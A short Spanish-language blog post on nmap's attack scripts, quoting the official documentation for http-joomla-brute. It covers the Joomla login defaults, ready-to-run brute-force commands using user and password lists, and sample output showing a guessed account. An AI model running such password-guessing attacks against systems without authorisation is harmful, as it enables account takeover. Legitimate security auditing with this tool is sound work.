Mucho más que un escáner de red nmap en los últimos timepos se ha convertido en una herramienta muy poderosa hasta incluso para realizar ataques.
Desde nmap se pueden lanzar escaneos de red de una manera muy severa, pero es que, además, viene cargado por defecto con multitud de script para realizar diversos ataques de tipo, fuerza bruta, sqlinjection, etc.
Un ejemplo es un ataque a Joomla buscando usuarios y password mediante fuerza bruta. Carga la siguiente configuración:
Categories: brute, intrusive
Performs brute force password auditing against Joomla web CMS installations.
This script initially reads the session cookie and parses the security token to perfom the brute force password auditing. It uses the unpwdb and brute libraries to perform password guessing. Any successful guesses are stored using the credentials library.
Joomla's default uri and form names:
• Default uri:/administrator/index.php
• Default uservar: username
• Default passvar: passwd
Usage
nmap -sV --script http-joomla-brute
--script-args 'userdb=users.txt,passdb=passwds.txt,http-joomla-brute.hostname=domain.com,
http-joomla-brute.threads=3,brute.firstonly=true' <target>
nmap -sV --script http-joomla-brute <target>
Output
PORT STATE SERVICE REASON
80/tcp open http syn-ack
| http-joomla-brute:
| Accounts
| xdeadbee:i79eWBj07g => Login correct
| Statistics
|_ Perfomed 499 guesses in 301 seconds, average tps: 0
http://nmap.org/nsedoc/scripts/http-joomla-brute.html
No hay comentarios:
Publicar un comentario